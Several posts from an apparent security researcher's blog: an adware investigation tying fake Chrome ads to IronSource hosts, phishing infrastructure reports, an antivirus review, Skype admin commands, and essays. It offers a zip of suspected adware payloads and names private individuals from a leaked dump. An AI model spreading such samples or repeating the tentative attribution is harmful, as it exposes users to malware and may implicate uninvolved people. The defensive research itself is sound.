Adware Empire – IronSource and InstallCore

Adware Empire – IronSource and InstallCore

In a recent Adware campaign using malicious Bing ads led me to a Chrome Download that eventually deploys Adware to the user’s computer. The IPs and types of Adware connect back to IronSource Ltd, Babylon Software Ltd., and InstallCore – all Israeli companies that have connections to Adware. See here, and here.

(Note: This was reported heavily by the media ZDNet, OnMSFT, Inquirer, Alphr  in recent days. My discovery of the malicious ads is  independent of any other source. My list of 3,500 IronSource Hostnames is exclusive as is all of the IP research behind the Adware.)

At this time there appears to be a publisher that’s steering users to a network of sites that deliver a payload of Adware. Please note that I have only made tangential connections between said publisher and these aforementioned companies. Various IP addresses and analysis of the Adware point to IronSource as the controlling entity of the servers that the Adware is communicating with after it’s delivered. That’s not to say that IronSource necessarily aware that a publisher (pay-per-install) is redirecting visitors to sites that impersonate Google Chrome.

The process began by searching for ‘Download Chrome‘. An ad at the top of the page looks like a legitimate Chrome advertisement and has an ‘Ad’ marker clearly visible but is poisoned as it leads to a false Google Chrome domain.

Notice how the ad below says “Chrome is a fast,secure” browser and is missing a space.


A fake chrome website ‘‘ is presented to the user when they click the top ad:



Clicking ‘Download Chrome‘ leads the user to a URL:
302 Redirect
Which leads to another URL with the payload: 

^^ File above on Virustotal (1/70) is only detected by BitDefender. Here’s the JoeSandBox Malware Analysis. Malware type delivered is DealAgent which is considered Adware.

We discovered a number of different Adware families being delivered from the hosts this file communicated with including Amonetize, BitVote Miner, Babylon Toolbar, InstallCore, Strictor, Dealply, InstallMiez (MacOS), OpenCandy, Optimizer Pro, SProtector, Crepreote, AdvancedMacCleaner, Vittalia, OpinionSpy, Spynion, and Adware going by many other names across all of the IPs involved. There was also a prevalence of MacOS unwanted programs and Adware communicating to these hosts similarly to Command & Control infrastructure in Malware. (JoeSandBox Malware Analysis)

A video below shows the full sequence of events:

We’ve compiled a video of the event and screenshots to walk thru the process of encountering the Adware. In our video, the Antivirus BitDefender blocks the attack, and it was the only of 70 other engines that detected it on VirusTotal. See JoeSandBox full analysis.

Deeper Investigation

***Update#1 Check out this list of 3,500 IronSource Hostnames still active!

***Update #2 Related IP address in a block owned by IronSource199.58.87.151. It contains interesting files that appear to be payloads for the Adware applications. Curiously a few are named ‘KAVcompatibilityCheck.cis‘ and ‘Symantec_Norton_IronSourcev5.cis‘. Here’s a zip of the files I downloaded from the URLs in VirusTotal. Can you analyze these?

Below I will investigate 3 domains. One belonging to the publisher, and the other two appear to funnel traffic using a referrer ID to a payload domain with round-robin DNS. Several of the IPs it resolves to belong to IronSource based on WHOIS Records. Other are unidentified but given the identical file structure and activity, I’d say there’s a great chance it’s all connected. As you scroll down you’ll find a piece of evidence. I encourage you to continue researching them and connecting the dots. Let me know what you find…


The landing page is a 116-day old domain registered by [email protected] at an IP address that reportedly belongs to Vultr Holdings, LLC.

Example of the site ‘’:

A number of other domains are registered to this user with the word ‘Chrome’ or ‘Google’ in them.

Two other domains that stand out like the ‘‘ up top. They don’t seem to fit the profile of the fake Chrome sites. Below are ‘, and ‘‘ from 3-4 years ago.

Information on registrar:

Blog @ no logins since 2007 –

Pastebin link has ‘456223’, ‘richard86811’, ‘868118918’, ‘[email protected]” in a DB dump of some kind that reveals another e-mail associated with the Gmail used to register these domains. The number 86 is the country code for China and 86-811-8918 could potentially be a partial phone number.

Names associated w/ domains: Jiaqiang Li (Jiangmen & Guangdong, China) and Chen Weilong (Guangdong, China)

Domain #2:

This domain is the initial redirector after you click Download Chrome. It’s a 20-day old domain currently being protected by Cloudflare. It’s not uncommon to see malicious sites behind Cloudflare. I’ve made dozens of attempts to report abuse to this vendor only to be rebuffed and told that “Our service is a pass-thru and we do not control the content of our customers”.

The VirusTotal results show not only that this domain is rated Malware by Fortinet, PREBYTES, and but that others on the same IP appear to be backdoor PHP files and other malicious looking randomized type domains. Unrelated to this campaign but goes to show you that it can both protect the good guys, and obfuscate the real location of the bad guys.

Domain #3:

This domain is 101-day old and using rotating Amazon IPs since at least 10/08/2018 based on passive DNS. Not surprising as we see plenty of hacked AWS accounts, and/or fraudulent ones that attackers are controlling domains on with no legitimate front page.

Other files with different packing are showing various levels of detection with AV Agents.

Malware ChromeSetup.exe is detected as InstallCore or a basic dropper/trojan.

Click for JoeSandBox Analysis of these files and domain goes into depth:

Domain #4: (dev, img, remote)

The ChromeSetup.exe dropped file communicates with a couple of subdomains on a 35-day old domain using AWS DNS. There is a connection with this domain and IPs owned by IronSource at LeaseWeb. Also, many of the IPs that resolve have the ‘Babylon Toolbar‘ a piece of software made by Babylon Software Ltd in Israel. is a domain that many images are pulled from for the ChromeSetup.exe file and there’s no shortage of IPs behind it.

We resolved them with Whatsmydns globally to find a round-robin of addresses:

IPs: [ (Active) (Old), (Old) ] (IronSource Israel via LeaseWeb)

Note how IronSource’s IP range has plenty of misleading or downright fake file names. These aren’t files that are ‘communicating’ but ones that have been pulled down from these hosts.

Check out this list of 3,500 IronSource Domains most are still active!

Note ‘’ is hosted off of this IP owned by IronSource. Here’s a discussion between two hackers on a forum below about doing Adware installs for them linking the companies together. InstallCore is an ‘IronSource’ service.

LeaseWeb identifies the customer in WHOIS records: is a domain we can see ChromeSetup.exe talks to this domain often as confirmed in the sandbox analysis

Note that each IP has a Virustotal link to see it’s activity:

IP: [,] –  (Amazon AWS)

IP: [] (

IP: [] [] (NForce Entertainment B.V.)

IP: [] – (Leaseweb)

IPs: [,,] (Midphase

IP: [] ( via LeaseWeb)

The ChromeSetup.exe file talks heavily to these hosts and grabs not only images but suspicious files. See the JoeSandBox analysis for all communications.

Oct 26, 2018 6129 OUT HEAD /ofr/Solululadul/osutils.cis HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache

(SHA256: 168656b0a807e5fa2c016d637c0c02d83753919ac5a8f493895e9dddce1a916c)

Still working on this investigation…. Have any tips? Drop me a line in my contact form.

Net Neutrality – The Spirit Lives On

Net Neutrality – The Spirit Lives On

What if one day your Netflix suddenly stopped streaming and displayed an error message to call your Internet Service Provider for assistance? You place the call, and the provider advises that you’re currently not subscribed to the 3rd party streaming plan to access this type of content. Come to find out; the provider is now charging a fee for access to streaming content outside of its network. You’ll have to purchase a package to access Netflix or be forced to access the providers own video streaming service which comes at an additional cost. Net Neutrality rules are protections created in the spirit of a “need to ensure the openness of the Internet, preserving users’ free and nondiscriminatory access to content, applications or services available on the Internet.” (Bello & Jung, 2015).

The scenario with Netflix is but a glimpse into the reality of a world painted by those who oppose removing the protections. If a provider does make a user pay for specific services like gaming, video streaming, or establishing a remote connection to your office, it’s considered offering a “tiered service,” which differs from the unlimited subscription model of internet services today. Research suggests that repealing Net Neutrality regulations can be bad for consumers because they harm innovation and competition between providers, but also that repealing these laws allows for consumer internet traffic to be analyzed, manipulated to block content, and throttled to decrease the performance of the transmission speeds. The potential impacts to the consumer are interruptions to streaming, lower quality video, and possibly an inability to access certain types of services by requiring additional subscription fees, and some other scenarios that we’ve yet to imagine. ISPs may not be able to experiment with business models or innovate with new services in the market.

At the heart of the Net Neutrality debate is the concern that providers will be able to analyze, manipulate, throttle, or even block access to specific content on the internet. The term open internet comes to mind when thinking about the origins of the internet – an entity born free and not intended to be commercial in origin. The internet has evolved from a platform that was facilitating communication between universities, to the birth of e-commerce websites – and now services like cloud, the blockchain, or online distance learning leverage it to deliver content to every edge of the earth. It’s become a utility for all kinds of devices as well, for example, cars, refrigerators, water bottles, luggage, and even a surfboard. The possibilities are somewhat endless when you view things through the lens of the Open Internet versus the Restricted Internet. Consumers are increasingly adopting lifestyles that revolve around these services, which necessitates a discussion about the legal rights of ISPs to control information.

It’s entirely possible that ISPs will make changes that are “self-serving, and profit-maximizing goals when enhancing or degrading content carriage.” (Frieden, 2018). The service you have doesn’t currently come with the ‘package’ you have for internet access to these types of applications. What about employees who telecommute using a VPN connection to the office? Would ISPs be able to charge a premium for this kind of access, knowing that it’s for a commercial purpose? The short answer is yes; they’re able to categorize and sell products in any way that they’d like. It’s believed that “The Internet’s openness” should be understood as a guiding principle that transcends each of the layers/tiers and extends throughout the digital ecosystem, and that each of the stakeholders of this ecosystem is essential to its development. (CIGI, 2015).”. Keeping the spirit of the internet as an open place by integrating protections for consumers is essential to the discussion, and actions by the FCC. It’s proponents want to see these core values preserved and more transparency with how providers manage network traffic.

You might be asking yourself, is all of this for nothing? What is the real threat here, and are ISPs planning, or doing this kind of thing today? After all, if they have never done this before, then Net Neutrality could potentially be a solution in search of a problem. Is there any history, or even potential for abuse by these providers? The answer is yes, and one situation where a violation of Net Neutrality occurred when an organization called Public Knowledge complained to the FCC that the number two provider of internet Comcast was throttling BitTorrent Traffic. Comcast was working with a vendor who was Sandvine, a company that sells ‘Active Network Intelligence,’ a service which can give ISPs better visibility into exactly what kind of traffic is on the network. In a statement, the company explained that “Sandvine determined that the use of several Peer-to-Peer protocols was regularly generating disproportionate burdens on the network, primarily on the upstream portion of the network, causing congestion that was affecting other users on the network.” (Comcast, 2008). Based on this research, Comcast had reportedly achieved wide-scale deployment of a blocking platform in 2007 until the FCC ruled that the “The selective blocking of file-sharing traffic interfered with users’ rights to access the internet and to use applications of their choice.”. Although Comcast had a plausible explanation, it still violated the Net Neutrality rules because it interfered with the normal transmission of information. Comcast positioned itself to analyze, and interrupt certain types of legitimate communications without any transparency to its users. Notification of these practices had not been sent to its subscribers, effectively restricting any users of the BitTorrent file-sharing method that was used at one time by NASA to accelerate the distribution of satellite data. BitTorrent is not a completely illegitimate protocol, and even if it was the issue remains that customers were unaware of these activities. Based on this occurrence of the violation, it is entirely possible that ISPs could begin blocking traffic without the transparency provided by these regulations.

A key argument from opponents of repealing Net Neutrality rules is that it negatively impacts the innovation and competition between providers. The FCC commissioner stated that “…the regulations made things worse by limiting investment in high-speed networks and slowing broadband deployment. Under Title II, broadband network investment dropped more than 5.6% — the first time a decline has happened outside of a recession.” And went on to say that “Removing these outdated and unnecessary regulations will create a strong incentive for companies to pour resources into building better online infrastructure across the country and bringing faster, better, and cheaper Internet access to more Americans.” (FCC, 2018).

The stated intention of the government that repealing these rules will aid in expansion in rural and hard-to-service areas, as well as higher average speeds throughout the US. They also wanted to allow ISPs to experiment with different business models, such as giving priority to medical applications, or self-driving cars. ISPs may experiment with security, home automation, and services like artificial intelligence that can help improve the quality of your experience in a meaningful way. There are limitless possibilities for how companies could innovate these products. Mainly, the concern is that small players in the market and start-ups wouldn’t be able to create unique services to compete with larger companies. In fact, the FCC found that “Title II regulations are bad for competition. They disproportionately burden the small Internet service providers and new entrants that are best positioned to introduce more competition into the broadband marketplace.” (FCC, 2017) And also that “Restoring Internet freedom will lead to greater investment in building and expanding broadband networks in rural and low-income areas as well as additional competition—leading to better, faster, cheaper Internet access for all Americans, including those on the wrong side of the digital divide.”. Based on these statements, it would appear that repealing could promote innovation among ISPs.

The Net Neutrality rules came under attack in January 2017, when president Donald Trump appointed Ajit Pai, an FCC commissioner who had previously voted against Title II reclassification of the internet, as the new head of the FCC. Net Neutrality was finally repealed on June 11th of 2018 and is no longer in effect after nearly 20 years of having classified internet services under the protection of telecommunication laws.

As of June 20th, 2018 thirty-six states have proposed or passed a resolution, bill, or executive order to preserve Net Neutrality since the new rules were adopted. Six states, Hawaii, Montana, New Jersey, New York, Rhode Island, and Vermont, have addressed this change by issuing Executive Orders requiring companies wishing to contract with the State to confirm that they will meet the 2017 net neutrality requirements. Thirty states have proposed legislation reinstating the net neutrality rules or requiring state contractors to abide by them. Ten additional states initiated Resolutions supporting Net Neutrality principles (NRRI, 2018)

Current day, there is an internet service providers or ISPs, have to disclose information about under circumstances they block or slow traffic and to disclose if and when they offer paid-priority services. The FCC has preserved the ‘transparency’ rules that had many concerned about the power over that ISPs could potentially hold over these communications. This development mitigates the risk that providers would continue to engage in activities such as blocking or throttling connections as Comcast did with BitTorrent, and not tell it’s customers. The current ruling is a win for consumers, who are only seeking a basic set of guidelines or principals to regulate the behavior of providers. It doesn’t have to be called Net Neutrality, but it does have to have increased transparency and still allow ISPs to grow and innovate in the markets in which they operate. We can’t let it be used in an anti-competitive, fraudulent, or discriminatory way to harm consumers or take away the right to equal internet access abilities for all who seek it.

California net neutrality bill easily passes Assembly

Internet groups urge U.S. court to reinstate ‘net neutrality’ rules

Net Neutrality Repeal Enables Abuse By Carriers, Groups Tell Court

Ajit Pai killed net neutrality but still wants you to love the FCC

(Note: I’m actively updating this small paper I wrote for a class on Net Neutrality for a novice audience)


Bello, P., & Jung, J. (2015). Net Neutrality: Reflections on the Current Debate. GLOBAL COMMISSION ON INTERNET GOVERNANCE

CIGI. (2015). Net Neutrality: Reflections on the Current Debate


FCC. (2018, May 22). Releases Restoring Internet Freedom Order. Retrieved from

FCC. (2017). Myth Vs. Fact. Retrieved from

Frieden, R. r. (2018). Freedom to Discriminate: Assessing the Lawfulness and Utility of Biased Broadband Networks. Vanderbilt Journal Of Entertainment & Technology Law, 20(3), 655-708.

NRRI. (2018). Net Neutrality State Actions Tracker. Retrieved from

Skype – Why can’t it all be so simple

Skype – Why can’t it all be so simple

Skype now has four versions of its software – purely for your confusion and inconvenience. Most recently, Microsoft was on its way to canceling Skype v7.0, with a deadline of Sept 1st until an uproar from internet users not-so-quietly rolled that back. The new version of Skype that Microsoft is pushing now is called v8.0. There are issues users have brought up about its design and overall feel. One ‘idea’ on the Skype Voice site reads “Make Skype 8 look EXACTLY like Skype 7 Classic.” In its own forum, Microsoft stated that “Based on customer feedback, we are extending support for Skype 7 (Skype Classic) for some time. Our customers can continue to use Skype Classic until then. ”

Skype Release Notes is not being updated frequently by Microsoft. We’re seeing new versions, and 1 to 2 weeks later, there are still no details on what’s changed.

Skype FAQ and Known Issues has limited information on actual issues we’ve seen with the software. It would be nice to have a closed loop, with the Release Notes showing when things are fixed.

Here’s a quick rundown on versions of Skype:

Skype for Business – Used for SMB/Enterprises, typically via Office365, but can be hosted privately on Rackspace, etc.

Skype for Windows 10 v11 – Windows 10 app that runs off of the Microsoft Store. This version is part of a program called Universal Windows Platform, or UWP, which means it works identically across Windows 10 platforms like PC, tablet, phone, and holographic devices. At this time, it’s not clear if it is missing any features when compared to the new Skype Desktop, but it does seem to be a very basic touch-type app in Windows.

Skype Classic v7.0 – An apparent all-time favorite of Windows users, and they don’t want it to go away. It’s the “same old” same Skype and seems to be working perfectly. I’ve run into errors installing it on Windows 10 at times, which were probably due to a major update that MS still hadn’t put in their fixes to make it work.

Skype for Desktop v8.0 – Newest version of Skype that brings Free HD Video, @mentions, group calls with 24 users, and will soon have privacy features like off-the-record audio chats. The biggest value-add here is in those features, which are combined with a modern interface and, of course, the promise of future development.

There’s also: Skype for Web, Skype Meetings, Skype for Mac, Skype For Linux, Skype for Android, and Skype for iOS, if you feel like you don’t have enough Skype in your life.


I’ll make a list of known issues and fixes as I test the software. Please see below for some of the common deployment and usage-type problems I’ve found in Skype, especially on the new v8.0.

  • Skype v8.0 – attempts to launch SkypeSetup.exe out of the user profile when the user has no admin permissions. The user can NOT open Skype – even when they hit No, the program keeps trying to trigger this download file. This happens every time Skype releases an update, and it will effectively lock the user out until the admin credentials are provided.

Adding these lines to the hosts file seemed to help block this version of Skype from trying to auto-upgrade:

Delete or block the SkypeSetup file:

del "%APPDATA%\Microsoft\Skype For Desktop\SkypeSetup.exe" /f
  • Skype v8.0 – does not remove Skype Classic from a machine when you push it out. In my testing, I was able to remove Skype v7 first and then push Skype v8. It migrated my profile to the new version. If I pushed Skype v8 on top of v7, it would launch both on start-up. Simply removing v7 didn’t fix it – I had to push v8 again after the removal. Here’s my recommendation:
wmic /node:'LOCALHOST' /interactive:off product where "name LIKE 'Skype% 7.%'" call uninstall

Skype- /silent
  • Skype for Business – Installs with the Business version of Office365 and will NOT let you remove it from the computer. Go ahead try it… use a customized install XML and it won’t honor the request to keep Lync off the machine. Even if it does remove Lync, the app will automatically reinstall during an online repair of Office.

Remove from start-up:

reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\ /v Lync /f
  • Skype For Business– 2nd issue with Skype For Business is easily connecting to regular Skype users. Microsoft requires them to associate with a email before this can happen. You can’t find them, and they can’t find you until that has been done. In my testing, I could not add my personal Skype account to a test instance running for Business without the Microsoft email association.
  • Skype v11 for Windows 10 – This version of Skype can cause confusion and issues with compatibility when it comes to the new features offered by Skype Desktop v8.

Remove it using Powershell:

Set-ExecutionPolicy -Scope LocalMachine Restricted
Get-AppxPackage Microsoft.SkypeApp | Remove-AppxPackage

Panda Antivirus Adaptive Defense 360

Panda Antivirus Adaptive Defense 360

No Comments

We recently tested Panda Antivirus Adaptive Defense as a continuance to a previous review of NGAV products. Does Panda live up to its claims? Is it the future of Antivirus? It has it’s ups and downs but overall I think the issues we experienced can be fixed. It’s headed in the right direction and overall the interface is designed well for a modern protection platform.

Panda’s current version is 7. x and the product is Adaptive Defense 360. From the marketing on the website, you get the feeling that it’s not your average ‘Panda’ but it’s next-generation, sexy, and ready to eradicate even the most virulent samples.

During the test, I exchanged 178 emails with the vendor over a period of fewer than 90 days. I’ve learned a great deal through direct experience of its stability and effectiveness. It’s been my experience that you’d better test the heck out of these products. Not only with detection but the basic administration features as well. There can be bugs lurking that may not impact you on the security side but potentially impair your ability to control and manage endpoints. I went ahead and dug in using my basic Dell models and hoped for the best. Keep in mind that the things I don’t ‘like’ are bugs that can be resolved – not necessarily fatal issues. Here’s my evaluation…

*** Update 8/13 – Panda is aware of this blog and actively working to fix any of the issues I found. They’ve allocated folks from Product Management, Engineering and other teams to help improve response.

A few things to note:

1. My blog recommends products on occasion but has nothing for sale
2. Bugs like to come out when I’m around so careful if I sign up for a demo
3. I don’t drink the kool-aid so I look forward to lifting the marketing curtain

Machines Tested:

Dell Latitude E6440, E5470, E5480
Dell XPS 8390 (Desktop)
Dell Inspiron (7000 Series)
Windows 7 and Windows 10

Things we liked: 

  • Support is light speed and much more responsive than BitDefender. We received prompt responses and consistent service from all of the techs. They responded appropriately to our concerns. Many times it was just a matter of reproducing the issues and gathering the right data. Panda can trigger a ‘PSINFO’ tool to gather support data without you having to send any technical information to support. In comparison, I’ve waited days and days for BitDefender support to reply. Even when they do it’s not with any urgency. If you call there is typically no way to speak to anyone live at BitDefender until they call you back. Panda is easy to get on the phone and called me often when I was available before the afternoon time.
  • Panda recently implemented anti-tampering. I’ve been advocating for this across a number of products. In Barkly, I could simply stop any of the AV processes, execute malcode and start them again. Panda protected its services even in the services.msc snap-in.
  • EDR function traced the source of execution back to a file on many virus samples we tested. We’d get an alert within 0-15 minutes that showed which process executed a particular piece of code and where it connected to. Very useful and is focused on the context of that execution. Liked this better than the fancy tree in other EDR products. It’s better to be able to alert on this in an e-mail format without needing to access the console.
  • Deployment tools were adequate in that there were no major issues with installing, uninstalling or deploying the files. Minimal interruption or notices to the machine when pushing it down with a script. Removal from the console happens in under 15 minutes on most machines.
  • Panda’s support is phenomenal despite us having many bugs with it on our particular platform that was available to test. They responded quickly and with haste. During our support they offered access to an early release version of Panda AD360 8.x as a way to get past known issues on v7.

Issues we worked with support on:

  • Crashing/Bluescreens – Panda caused many bug checks on my machines with the driver NNSPRV.SYS, and by many I mean over a dozen on multiple machines. The key for some was that they were running Intel Proset Drivers for Wireless on a slightly older version but I can not fully confirm that’s the cause. The crashes continued until we were put on an early release of version 8.0 that seemed to alleviate them. At the time though this was not a general release. Every dump had references to Panda drives in it when the crashes occurred and they happened often.

  • Performance Issues/Hangups – Machine slowdowns on several boxes that include severe delays opening applications. This happened several more times in the last few months with the most recent being on my own machine while I was using it. I captured video of this and called in to offer an impacted machine to Panda. They were unavailable to gather any data and did not recommend any steps to take on the machine at that time. I had to remove the product and could not wait until ‘tomorrow’ to find out what I needed to do. That issue is still not identified or resolved. The burden was on me to prove that this is an issue even though I’ve captured live video of it happening multiple times. Panda was using 10,000 handles on PSANHOST.EXE when the issue occurs. Chrome tabs were completely hung up and simple applications like Notepad.exe took more than a minute to open. The issue was immediately resolved by removing the AV – which by the way was so hung up it took about 30 minutes. After the removal, we could immediately surf the web, and open up applications.
  • Service instability – Panda services were crashing on version 7.x-8.x randomly. We detected this in the monitoring of its services, and the issue impacts the latest version. Support requested that we manually gather using a dump tool for them to access the issue. The main service controlling Panda crashes and says ‘The Panda Endpoint Administration Agent service terminated unexpectedly’ on these machines. There is no fix or explanation for this issue, and it’s separate from the ones shown above. We don’t know why the service keeps crashing off or what to do next. Even if we did, we believe that this ‘broken agent’ issue leads to decreased security for those endpoints when they aren’t able to update or communicate properly. A lot of time being spent manually reinstalling agents to fix this issue.
  • Upgrade Issues – Panda also failed to upgrade from v7 to v8 automatically on around 25% of the computers creating a situation where it was ‘broken’ and not functional. There was, of course, a fix or method for support to help us but it was manual, involved remoting into each machine and again the upgrade just didn’t work without any explanation. Many of the computers have rebooted numerous times and get repeatedly prompted to ‘Upgrade Panda’ when they’ve accepted that menu over and over. Meanwhile, the agents did not have full protection because the install was technically broken between versions.

 (Panda Support)

  • Dropper Detection / Kill Chain Issues – None of the files I opened with Malicious Word Macros were detected until the actual payload ran. Panda did not detect many files on-access but only once they ran and down the line in the attack chain. It will stop the PowerShell command from running but only at the point of execution. A little too close for comfort especially when many other tools see the evil in the Macro’s and malware code embedded in the document. Out of a dozen files of so I got live from the internet, none of the droppers triggered an alert until they tried something fishy. Panda was quick about adding them as a generic type of alert when I sent in samples. There is no automated system or method to submit samples to Panda w/o manually opening an e-mail ticket. Panda’s ‘EDR’ type execution report fails to correlate the malicious .doc I opened and only ‘sees’ the Powershell. But what ran the command? What were the parameters?

 ( Panda Support)

  • False Positives – We found that Panda would trigger on innocuous Windows 10 processes like those that update the Windows Store applications. In some cases it labeled them as ‘potentially malicious’ and in lock mode, it halted execution while it could determine if they were true positive malicious. This wasn’t the only ‘system’ type file and we encountered many more with Nvidia and a driver from Intel.
  • Web Filtering / Phishing – Many of the Malware and Phishing URLs I attempted to visit wasn’t classified by the software. During my investigation of the ‘Master Angler’ story this month I had Panda running and it never blocked any of the URLs. I submitted a URL to Panda with my blog and they added that single address but no others that were obviously running off that same IP. After reporting many of these URLs to Panda I realized that the phishing protection was outsourced to Cyren and not using its own threat intelligence.
  • Buggy Alerting- Malware alerts were configured for the web and alerted directly from the IP via SMTP to my e-mail server kind of strange. Not only that but there were still variables in the e-mail that was unresolved like {ExtendedUrlMalwareinfo}. The other issue was that I’d get tons of duplicates with the same information may be 5-10 e-mails in a blast from a single machine visiting a site. It says ‘Virus deleted’ but I couldn’t find anything malicious on some of these sites.

  • Console Outages –  Web console has issues on several occasions with server-side errors that prevented me from logging in. At this exact moment I keep logging in but it tells me for security reasons my session is timed out

  • Cookie Alarm – Panda sent alerts for cookies detected on machines and I couldn’t turn it off. There was no way to whitelist or otherwise exclude this extra noise.



Bad Bots – Headless Chrome

Bad Bots – Headless Chrome

No Comments

There’s never a shortage of bad bots and unidentifiable applications that crawl websites. Are they scraping the content? Updating it for some unnamed organization’s news site? Storing an archive of it? It’s not clear, as they typically won’t identify themselves with a legitimate robot-type user agent.

One group of firewall logs recently caught my eye for a few reasons. The first reason was that, similar to my issue with OVH Hosting in a previous blog, there were numerous clients connecting simultaneously with the same user agent. At any given time, 3 to 5 of these hosts would be crawling information, like tags and posts, off of the site. Viewing the visitors live, I saw that a high percentage of the IPs below were all using the same user agent.

Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/64.0.3282.119 Safari/537.36

Here’s a copy of the Firewall log where I set up a rule to do an extended browser validation using javascript:

Does anybody know the purpose and source of these connections? Did you end up here by searching of the IPs? All of the subnets below belong to Amazon Technologies and could possibly be connected behind the scenes on Amazon Web Services.

100+ IP Addresses recorded in the month of July:

Phishing – A Master Anglers Toolbox

Phishing – A Master Anglers Toolbox

No Comments

We recently came across a researchers gold mine of phishing sites. It all started with a PDF file received via an email called Post-Label.  The file itself is harmless, but it links to the USPS scam shown below in the screenshots.


Further analysis of this IP found that it belongs to QuadraNet a colocation provider who’s only involved in hosting physical servers for its clients. The service is being provided to AlphaRacks a VPS provider that rents out computing space by offering hosting to it’s clients.

VirusTotal has a ton of sites being hosted off this box, and almost an unbelievable amount of phishing pages and malware. We found more than 60 different brands being phished off this one IP address. The activity goes back to March 2018. It’s a phenomenon I call ‘hiding in plain sight,’ and that’s because vendors have been detecting the issue for many months, but no one has taken the initiative to file an abuse report.

We filed an abuse report and QuadraNet is now aware of the issue. They’ve committed to cutting off access from this IP if the client does not respond within a period of time and clean up the phishing sites. We’ve included numerous updates below as to the progress of the cleanup below just before the screenshots we have collected over a period of months.

URLScan provides regular screenshots of the activity hosted on various domains at this IP address. I’ve seen hundreds and potentially thousands of domains pointing to this location over the last several months. reports 1,945 phishing URLs have been observed off of this address.

Brands being phished include CIBC Bank, DHL, GoDaddy, Microsoft Live, Office 365, OneDrive, Outlook Web Access, PayPal, USPS, 50+  others all on a single IP. This is a master angler at work, folks!

Victims we’ve seen phishing attempts against the companies below. This is is not a confirmation that they were compromised only that they scanned a URL with an e-mail inside of it so we presume that the owner received it via inbound phishing e-mail. Keep in mind this list only represents a small portion of the recipients and just a couple of days worth of URLs being scanned on VirusTotal:

Australia and New Zealand Bank
Aditya Birla Group
Conrad Hotels
Fox Broadcasting
Owens Corning
QBE Insurance Group
State of Minnesota
Tetra Pak
The Linde Group
VF Corporation

NOTE: Some of this research is incomplete and should be investigated further by other researchers. I tend to post these kinds of ‘live’ hacks quickly, to get the word out and let folks experiment a bit before the hackers are shut down. The first thing I did was notify the hosting provider, so the clock is ticking. Or maybe it’s not, depending on how well they handle abuse complaints.

E-mail possibly associated with activity: [email protected] 

Dozens of the sites have login pages for the Pony Botnet:


10/16 – We will allow the provider Quadranet to continue working with its client to remediate the issue.

9/17 – Activity continues and no response from ‘[email protected]‘ or Quadranet.

8/21 – Quadranet has reportedly taken action against AlphaRacks by null-routing it’s IP again due to the abuse. IP was responding again a short time later.

 8/14 – IP still has dozens of phishing sites, malware binaries and botnet communication files hosted on it. I’ve been e-mailing this information to the upstream provider who is QuadraNet. The co-location customer this IP belongs to either doesn’t have the time to keep an eye on this, or doesn’t know how to stop these phisherman. It’s also possible the server is compromised or that the operator AlphaRacks is complicit in the activity. I found that the blocks used to be owned by Crissic Solutions (Skylar MacMinn, Germany) who both worked at Quadranet and occupied the same IP space. An unknown entity was selling AlphaRacks on a web forum about 4 years ago at post#1 post#2.

8/7 – IP continues to host phishing activity. We have reported additional sites to QuadraNet who will presumably notify the colocation client again. Keep in mind we noticed this activity start trending upward in March of 2018. Obviously, they’ve been outsmarting both of these parties for a good deal of time nearly half of 2018.

7/23QuadraNet has notified me that they are going to “null-route the IP address and reach out to our customer, they may not have been aware of the number of domains involved.” after they had repeatedly asked the customer to disable these services. IP went down and was back up within a few hours. We confirmed it still had 5+ phishing sites live on it and reported that back to QuadraNet. We suspect the client is Alpharacks Hosting and that up to 1,200 domains may be on this server most of the malicious.

Screenshots below:

I’ve reported this to the Quadranet, and PhishTank. Google Chrome warned against visiting many of these sites hosted on this IP.

Phishing – New Tactics and Techniques

Phishing – New Tactics and Techniques

We’ve recently observed a new trend with phishing and targeted malware attacks that use domains to bypass anti-spam. The attackers are using valid domains, SPF, SMTP, and reply addresses that mimic newsletter bouncebacks. These tactics allow the messages to bypass reputational and other types of checks.

The attachments are typical droppers, highly obfuscated and using Microsoft Word macros. Attachments were known under names such as Trojan-Downloader, VBA.Agent, and Exploit.Siggen leveraging Office CVE-2017-0199.

Domains w/ Virustotal link:

DocuSign –

Bank Of America –

Internal Revenue Service –

Dunn & Bradstreet –

Tactics and Techniques:

Attackers are using return addresses that resemble a real newsletter bounceback.

SPF records exist for the domain, and they match the servers that send the targeted emails. They are online, answering to SMTP connections that use the appropriate banner for the website.

Attackers are using VPS or full service hosting accounts to launch attacks like LeaseWeb and Secure Servers LLC. Devices have remote administration ports and services open.

Incoming emails are highly obfuscated by a randomly generated Word document with macros. Attackers will change payload if a “virus” message is received. If it’s a RBL message, they will switch to another SMTP address and continue to hammer the system until it allows a delivery. Messages are modified near real-time after each rejection, until one is accepted.

Fighting Back:

If I had not configured a HOLD on documents with macros, these would have been delivered by my spam provider. I had an option configured to recognize “Newly Observed Domain,” but it didn’t recognize them, and it wasn’t set to block them. It may be a good idea to inspect these manually, or you could put in some kind of workflow for content examination to alert you when they are delivered. I’m looking for keywords like the ones below, and I’m also scanning some of the messages:

Account Locked
Hello Dear
Password Reset
Suspended Account
Unusual Sign-In


Domain #1


Domain record shows that it was registered today:

Here’s the SPF record for

SMTP server at the host answers on behalf of this domain as well for spam filters that form a connection back to the system during validation:

The sender passes SPF checks because they’re using a legitimate domain:

spf=pass (spfCheck: domain of designates as permitted sender) client-ip=; [email protected]y;
Content-Type: multipart/mixed;


Nmap results show smtp/25 is open, and proxy/8080 is listening. Neither is an open relay, so we assume the attacker configured for quick remote access and spamming:


Email content was a word document:

Content-Disposition: attachment; filename="3873JDSB987391.doc"
Content-Transfer-Encoding: base64
Content-Type: application/msword; name="3873JDSB987391.doc"

Domain #2




Domain #3



Domain #4


Trolling – Hate and Video Games

Trolling – Hate and Video Games

No Comments

“Do you feel the way you hate? (or) Do you hate the way you feel?” –Bush, Greedy Fly

I started thinking about this topic, and ultimately a blog, when a troll was repeatedly scrolling the “N” word on a video game I was playing last night. What’s more, this person felt comfortable doing it in front of 64+ other folks of unknown age, or ethnic backgrounds who were playing the game with us! I thought to myself, who are these trolls? What drives them? Do they have jobs or a family? I got the sense that hate goes deep into the psyche of the individual. If your attitude informs behavior, then typing that word over and over means that you are:

  1. Clearly racist, and
  2. Feeling untouchable because you are on the internet.

